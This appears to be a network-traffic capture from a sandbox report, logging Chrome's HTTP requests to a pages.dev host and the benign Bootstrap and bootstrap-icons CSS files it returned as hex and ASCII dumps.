              2024-08-29 22:47:30 UTC581OUTGET /npm/bootstrap-icons-1.8.1/font/bootstrap-icons.css HTTP/1.1
              Host: dfsvgd.pages.dev
              Connection: keep-alive
              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
              sec-ch-ua-mobile: ?0
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              sec-ch-ua-platform: "Windows"
              Accept: text/css,*/*;q=0.1
              Sec-Fetch-Site: same-origin
              Sec-Fetch-Mode: no-cors
              Sec-Fetch-Dest: style
              Referer: https://dfsvgd.pages.dev/
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.9
              2024-08-29 22:47:30 UTC748INHTTP/1.1 200 OK
              Date: Thu, 29 Aug 2024 22:47:30 GMT
              Content-Type: text/css; charset=utf-8
              Content-Length: 80439
              Connection: close
              Access-Control-Allow-Origin: *
              Cache-Control: public, max-age=0, must-revalidate
              ETag: "e923e3e66559c9a0e65917c26a484c62"
              referrer-policy: strict-origin-when-cross-origin
              x-content-type-options: nosniff
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8pv5SLQdY1NtE7pPoLC0eSnYf1MZgid%2BYcQl3WAwKxM7JAkXRPw4O4DNt%2B0O%2FOOoA0xg1FYw0mlQ0Rx9Q7qvnkXOJoXRnqpTWMxHGD2FMsnKU4zGokRK0CI06PgFRUrCFzn0"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8bb015516c03429b-EWR
              alt-svc: h3=":443"; ma=86400
              2024-08-29 22:47:30 UTC621INData Raw: 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 22 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 22 66 6f 6e 74 73 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 77 6f 66 66 22 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 0a 75 72 6c 28 22 66 6f 6e 74 73 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 77 6f 66 66 22 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 3b 0a 7d 0a 0a 2e 62 69 3a 3a 62 65 66 6f 72 65 2c 0a 5b 63 6c 61 73 73 5e 3d 22 62 69 2d 22 5d 3a 3a 62 65 66 6f 72 65 2c 0a 5b 63 6c 61 73 73 2a 3d 22 20 62 69 2d 22 5d 3a 3a 62 65 66 6f 72 65 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 66 6f 6e 74 2d 66 61
              Data Ascii: @font-face { font-family: "bootstrap-icons"; src: url("fonts/bootstrap-icons.woff") format("woff2"),url("fonts/bootstrap-icons.woff") format("woff");}.bi::before,[class^="bi-"]::before,[class*=" bi-"]::before { display: inline-block; font-fa
              2024-08-29 22:47:30 UTC1369INData Raw: 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 30 32 22 3b 20 7d 0a 2e 62 69 2d 61 6c 69 67 6e 2d 62 6f 74 74 6f 6d 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 30 33 22 3b 20 7d 0a 2e 62 69 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 30 34 22 3b 20 7d 0a 2e 62 69 2d 61 6c 69 67 6e 2d 65 6e 64 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 30 35 22 3b 20 7d 0a 2e 62 69 2d 61 6c 69 67 6e 2d 6d 69 64 64 6c 65 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 30 36 22 3b 20 7d 0a 2e 62 69 2d 61 6c 69 67 6e 2d 73 74 61 72 74 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 30 37 22 3b 20 7d 0a 2e 62 69 2d
              Data Ascii: content: "\f102"; }.bi-align-bottom::before { content: "\f103"; }.bi-align-center::before { content: "\f104"; }.bi-align-end::before { content: "\f105"; }.bi-align-middle::before { content: "\f106"; }.bi-align-start::before { content: "\f107"; }.bi-
              2024-08-29 22:47:30 UTC1369INData Raw: 2d 64 6f 77 6e 2d 6c 65 66 74 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 31 65 22 3b 20 7d 0a 2e 62 69 2d 61 72 72 6f 77 2d 64 6f 77 6e 2d 72 69 67 68 74 2d 63 69 72 63 6c 65 2d 66 69 6c 6c 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 31 66 22 3b 20 7d 0a 2e 62 69 2d 61 72 72 6f 77 2d 64 6f 77 6e 2d 72 69 67 68 74 2d 63 69 72 63 6c 65 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 32 30 22 3b 20 7d 0a 2e 62 69 2d 61 72 72 6f 77 2d 64 6f 77 6e 2d 72 69 67 68 74 2d 73 71 75 61 72 65 2d 66 69 6c 6c 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 32 31 22 3b 20 7d 0a 2e 62 69 2d 61 72 72 6f 77 2d 64 6f 77 6e 2d 72 69 67 68 74 2d 73 71 75 61 72 65 3a 3a 62
              Data Ascii: -down-left::before { content: "\f11e"; }.bi-arrow-down-right-circle-fill::before { content: "\f11f"; }.bi-arrow-down-right-circle::before { content: "\f120"; }.bi-arrow-down-right-square-fill::before { content: "\f121"; }.bi-arrow-down-right-square::b
              2024-08-29 22:47:30 UTC1369INData Raw: 66 31 33 37 22 3b 20 7d 0a 2e 62 69 2d 61 72 72 6f 77 2d 72 69 67 68 74 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 33 38 22 3b 20 7d 0a 2e 62 69 2d 61 72 72 6f 77 2d 75 70 2d 63 69 72 63 6c 65 2d 66 69 6c 6c 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 33 39 22 3b 20 7d 0a 2e 62 69 2d 61 72 72 6f 77 2d 75 70 2d 63 69 72 63 6c 65 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 33 61 22 3b 20 7d 0a 2e 62 69 2d 61 72 72 6f 77 2d 75 70 2d 6c 65 66 74 2d 63 69 72 63 6c 65 2d 66 69 6c 6c 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 33 62 22 3b 20 7d 0a 2e 62 69 2d 61 72 72 6f 77 2d 75 70 2d 6c 65 66 74 2d 63 69 72 63 6c 65 3a 3a 62 65 66 6f 72 65 20 7b 20
              Data Ascii: f137"; }.bi-arrow-right::before { content: "\f138"; }.bi-arrow-up-circle-fill::before { content: "\f139"; }.bi-arrow-up-circle::before { content: "\f13a"; }.bi-arrow-up-left-circle-fill::before { content: "\f13b"; }.bi-arrow-up-left-circle::before {
              2024-08-29 22:47:30 UTC1369INData Raw: 2d 61 74 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 35 32 22 3b 20 7d 0a 2e 62 69 2d 61 77 61 72 64 2d 66 69 6c 6c 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 35 33 22 3b 20 7d 0a 2e 62 69 2d 61 77 61 72 64 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 35 34 22 3b 20 7d 0a 2e 62 69 2d 62 61 63 6b 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 35 35 22 3b 20 7d 0a 2e 62 69 2d 62 61 63 6b 73 70 61 63 65 2d 66 69 6c 6c 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 35 36 22 3b 20 7d 0a 2e 62 69 2d 62 61 63 6b 73 70 61 63 65 2d 72 65 76 65 72 73 65 2d 66 69 6c 6c 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c
              Data Ascii: -at::before { content: "\f152"; }.bi-award-fill::before { content: "\f153"; }.bi-award::before { content: "\f154"; }.bi-back::before { content: "\f155"; }.bi-backspace-fill::before { content: "\f156"; }.bi-backspace-reverse-fill::before { content: "\
              2024-08-29 22:47:30 UTC1369INData Raw: 63 68 65 63 6b 2d 66 69 6c 6c 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 37 30 22 3b 20 7d 0a 2e 62 69 2d 62 61 67 2d 63 68 65 63 6b 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 37 31 22 3b 20 7d 0a 2e 62 69 2d 62 61 67 2d 64 61 73 68 2d 66 69 6c 6c 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 37 32 22 3b 20 7d 0a 2e 62 69 2d 62 61 67 2d 64 61 73 68 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 37 33 22 3b 20 7d 0a 2e 62 69 2d 62 61 67 2d 66 69 6c 6c 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 37 34 22 3b 20 7d 0a 2e 62 69 2d 62 61 67 2d 70 6c 75 73 2d 66 69 6c 6c 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a
              Data Ascii: check-fill::before { content: "\f170"; }.bi-bag-check::before { content: "\f171"; }.bi-bag-dash-fill::before { content: "\f172"; }.bi-bag-dash::before { content: "\f173"; }.bi-bag-fill::before { content: "\f174"; }.bi-bag-plus-fill::before { content:
              2024-08-29 22:47:30 UTC1369INData Raw: 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 38 65 22 3b 20 7d 0a 2e 62 69 2d 62 69 6e 6f 63 75 6c 61 72 73 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 38 66 22 3b 20 7d 0a 2e 62 69 2d 62 6c 6f 63 6b 71 75 6f 74 65 2d 6c 65 66 74 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 39 30 22 3b 20 7d 0a 2e 62 69 2d 62 6c 6f 63 6b 71 75 6f 74 65 2d 72 69 67 68 74 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 39 31 22 3b 20 7d 0a 2e 62 69 2d 62 6f 6f 6b 2d 66 69 6c 6c 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 39 32 22 3b 20 7d 0a 2e 62 69 2d 62 6f 6f 6b 2d 68 61 6c 66 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 39 33 22 3b 20 7d 0a 2e
              Data Ascii: content: "\f18e"; }.bi-binoculars::before { content: "\f18f"; }.bi-blockquote-left::before { content: "\f190"; }.bi-blockquote-right::before { content: "\f191"; }.bi-book-fill::before { content: "\f192"; }.bi-book-half::before { content: "\f193"; }.
              2024-08-29 22:47:30 UTC1369INData Raw: 64 65 72 2d 63 65 6e 74 65 72 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 61 62 22 3b 20 7d 0a 2e 62 69 2d 62 6f 72 64 65 72 2d 69 6e 6e 65 72 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 61 63 22 3b 20 7d 0a 2e 62 69 2d 62 6f 72 64 65 72 2d 6c 65 66 74 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 61 64 22 3b 20 7d 0a 2e 62 69 2d 62 6f 72 64 65 72 2d 6d 69 64 64 6c 65 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 61 65 22 3b 20 7d 0a 2e 62 69 2d 62 6f 72 64 65 72 2d 6f 75 74 65 72 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 61 66 22 3b 20 7d 0a 2e 62 69 2d 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 3a 62 65 66 6f 72 65 20 7b
              Data Ascii: der-center::before { content: "\f1ab"; }.bi-border-inner::before { content: "\f1ac"; }.bi-border-left::before { content: "\f1ad"; }.bi-border-middle::before { content: "\f1ae"; }.bi-border-outer::before { content: "\f1af"; }.bi-border-right::before {
              2024-08-29 22:47:30 UTC1369INData Raw: 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 63 36 22 3b 20 7d 0a 2e 62 69 2d 62 6f 78 2d 73 65 61 6d 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 63 37 22 3b 20 7d 0a 2e 62 69 2d 62 6f 78 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 63 38 22 3b 20 7d 0a 2e 62 69 2d 62 72 61 63 65 73 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 63 39 22 3b 20 7d 0a 2e 62 69 2d 62 72 69 63 6b 73 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 63 61 22 3b 20 7d 0a 2e 62 69 2d 62 72 69 65 66 63 61 73 65 2d 66 69 6c 6c 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 63 62 22 3b 20 7d 0a 2e 62 69 2d 62 72 69 65 66 63 61 73
              Data Ascii: ::before { content: "\f1c6"; }.bi-box-seam::before { content: "\f1c7"; }.bi-box::before { content: "\f1c8"; }.bi-braces::before { content: "\f1c9"; }.bi-bricks::before { content: "\f1ca"; }.bi-briefcase-fill::before { content: "\f1cb"; }.bi-briefcas
              2024-08-29 22:47:30 UTC1369INData Raw: 6c 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 65 33 22 3b 20 7d 0a 2e 62 69 2d 63 61 6c 65 6e 64 61 72 2d 64 61 74 65 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 65 34 22 3b 20 7d 0a 2e 62 69 2d 63 61 6c 65 6e 64 61 72 2d 64 61 79 2d 66 69 6c 6c 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 65 35 22 3b 20 7d 0a 2e 62 69 2d 63 61 6c 65 6e 64 61 72 2d 64 61 79 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 65 36 22 3b 20 7d 0a 2e 62 69 2d 63 61 6c 65 6e 64 61 72 2d 65 76 65 6e 74 2d 66 69 6c 6c 3a 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 65 37 22 3b 20 7d 0a 2e 62 69 2d 63 61 6c 65 6e 64 61 72 2d 65 76 65 6e 74 3a 3a 62 65
              Data Ascii: l::before { content: "\f1e3"; }.bi-calendar-date::before { content: "\f1e4"; }.bi-calendar-day-fill::before { content: "\f1e5"; }.bi-calendar-day::before { content: "\f1e6"; }.bi-calendar-event-fill::before { content: "\f1e7"; }.bi-calendar-event::be


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.449738188.114.96.34432288C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              2024-08-29 22:47:30 UTC577OUTGET /npm/bootstrap-5.1.3/dist/css/bootstrap.min.css HTTP/1.1
              Host: dfsvgd.pages.dev
              Connection: keep-alive
              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
              sec-ch-ua-mobile: ?0
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              sec-ch-ua-platform: "Windows"
              Accept: text/css,*/*;q=0.1
              Sec-Fetch-Site: same-origin
              Sec-Fetch-Mode: no-cors
              Sec-Fetch-Dest: style
              Referer: https://dfsvgd.pages.dev/
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.9
              2024-08-29 22:47:30 UTC751INHTTP/1.1 200 OK
              Date: Thu, 29 Aug 2024 22:47:30 GMT
              Content-Type: text/css; charset=utf-8
              Content-Length: 163887
              Connection: close
              Access-Control-Allow-Origin: *
              Cache-Control: public, max-age=0, must-revalidate
              ETag: "77074764c111b28d243f7e446ef99209"
              referrer-policy: strict-origin-when-cross-origin
              x-content-type-options: nosniff
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F6wScsSlz%2BLaHmq4QiE8KUJIF%2FaAXvZuJkgn13p%2F%2FFcoUiJgE5v2ES17vMwkE4W5Ob8j8fc1wTW0e2kLY4WoqbNQMhwkJqeKiwxcwIrSkFWDPSynW8gRD5KDormqpuOQE9jR"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8bb0155188b01a07-EWR
              alt-svc: h3=":443"; ma=86400
              2024-08-29 22:47:30 UTC618INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2f 2a 21 0d 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 35 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 31 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 31 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0d 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0d 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 73 2d 62 6c 75 65 3a 23 30 64 36
              Data Ascii: @charset "UTF-8";/*! * Bootstrap v5.1.3 (https://getbootstrap.com/) * Copyright 2011-2021 The Bootstrap Authors * Copyright 2011-2021 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */:root{--bs-blue:#0d6
              2024-08-29 22:47:30 UTC1369INData Raw: 2d 2d 62 73 2d 67 72 61 79 2d 37 30 30 3a 23 34 39 35 30 35 37 3b 2d 2d 62 73 2d 67 72 61 79 2d 38 30 30 3a 23 33 34 33 61 34 30 3b 2d 2d 62 73 2d 67 72 61 79 2d 39 30 30 3a 23 32 31 32 35 32 39 3b 2d 2d 62 73 2d 70 72 69 6d 61 72 79 3a 23 30 64 36 65 66 64 3b 2d 2d 62 73 2d 73 65 63 6f 6e 64 61 72 79 3a 23 36 63 37 35 37 64 3b 2d 2d 62 73 2d 73 75 63 63 65 73 73 3a 23 31 39 38 37 35 34 3b 2d 2d 62 73 2d 69 6e 66 6f 3a 23 30 64 63 61 66 30 3b 2d 2d 62 73 2d 77 61 72 6e 69 6e 67 3a 23 66 66 63 31 30 37 3b 2d 2d 62 73 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 62 73 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 62 73 2d 64 61 72 6b 3a 23 32 31 32 35 32 39 3b 2d 2d 62 73 2d 70 72 69 6d 61 72 79 2d 72 67 62 3a 31 33 2c 31 31 30 2c 32 35 33 3b
              Data Ascii: --bs-gray-700:#495057;--bs-gray-800:#343a40;--bs-gray-900:#212529;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-primary-rgb:13,110,253;
              2024-08-29 22:47:30 UTC1369INData Raw: 6f 64 79 2d 6c 69 6e 65 2d 68 65 69 67 68 74 29 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 73 2d 62 6f 64 79 2d 63 6f 6c 6f 72 29 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 76 61 72 28 2d 2d 62 73 2d 62 6f 64 79 2d 74 65 78 74 2d 61 6c 69 67 6e 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 73 2d 62 6f 64 79 2d 62 67 29 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 68 72 7b 6d 61 72 67 69 6e 3a 31 72 65 6d 20 30 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 62 6f 72 64 65 72 3a 30
              Data Ascii: ody-line-height);color:var(--bs-body-color);text-align:var(--bs-body-text-align);background-color:var(--bs-body-bg);-webkit-text-size-adjust:100%;-webkit-tap-highlight-color:transparent}hr{margin:1rem 0;color:inherit;background-color:currentColor;border:0
              2024-08-29 22:47:30 UTC1369INData Raw: 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 63 66 38 65 33 7d 73 75 62 2c 73 75 70 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d 2e 35 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 30 64 36 65 66 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 30 61 35 38 63 61 7d 61 3a 6e 6f 74 28 5b 68 72 65 66 5d 29 3a 6e 6f 74 28 5b 63 6c 61 73 73 5d 29 2c 61 3a 6e 6f 74 28 5b 68 72 65 66 5d 29 3a 6e 6f 74 28 5b 63 6c 61 73 73 5d 29
              Data Ascii: ;background-color:#fcf8e3}sub,sup{position:relative;font-size:.75em;line-height:0;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}a{color:#0d6efd;text-decoration:underline}a:hover{color:#0a58ca}a:not([href]):not([class]),a:not([href]):not([class])
              2024-08-29 22:47:30 UTC1369INData Raw: 70 3a 6e 6f 72 6d 61 6c 7d 73 65 6c 65 63 74 3a 64 69 73 61 62 6c 65 64 7b 6f 70 61 63 69 74 79 3a 31 7d 5b 6c 69 73 74 5d 3a 3a 2d 77 65 62 6b 69 74 2d 63 61 6c 65 6e 64 61 72 2d 70 69 63 6b 65 72 2d 69 6e 64 69 63 61 74 6f 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 2c 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 2c 62 75 74 74 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 7d 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 2c 5b 74 79 70 65 3d 72 65 73 65 74 5d 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 2c 62 75 74 74 6f
              Data Ascii: p:normal}select:disabled{opacity:1}[list]::-webkit-calendar-picker-indicator{display:none}[type=button],[type=reset],[type=submit],button{-webkit-appearance:button}[type=button]:not(:disabled),[type=reset]:not(:disabled),[type=submit]:not(:disabled),butto
              2024-08-29 22:47:30 UTC1369INData Raw: 30 7d 2e 64 69 73 70 6c 61 79 2d 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 36 32 35 72 65 6d 20 2b 20 34 2e 35 76 77 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 64 69 73 70 6c 61 79 2d 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 35 72 65 6d 7d 7d 2e 64 69 73 70 6c 61 79 2d 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 35 37 35 72 65 6d 20 2b 20 33 2e 39 76 77 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 64 69 73 70 6c 61 79 2d 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34
              Data Ascii: 0}.display-1{font-size:calc(1.625rem + 4.5vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-1{font-size:5rem}}.display-2{font-size:calc(1.575rem + 3.9vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-2{font-size:4
              2024-08-29 22:47:30 UTC1369INData Raw: 72 65 6d 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 61 75 74 6f 7d 2e 66 69 67 75 72 65 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 66 69 67 75 72 65 2d 69 6d 67 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 7d 2e 66 69 67 75 72 65 2d 63 61 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 3b 63 6f 6c 6f 72 3a 23 36 63 37 35 37 64 7d 2e 63 6f 6e 74 61 69 6e 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 66 6c 75 69 64 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 6c 67 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 6d 64 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 78 6c 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 78 78 6c 7b 77 69 64
              Data Ascii: rem;max-width:100%;height:auto}.figure{display:inline-block}.figure-img{margin-bottom:.5rem;line-height:1}.figure-caption{font-size:.875em;color:#6c757d}.container,.container-fluid,.container-lg,.container-md,.container-sm,.container-xl,.container-xxl{wid
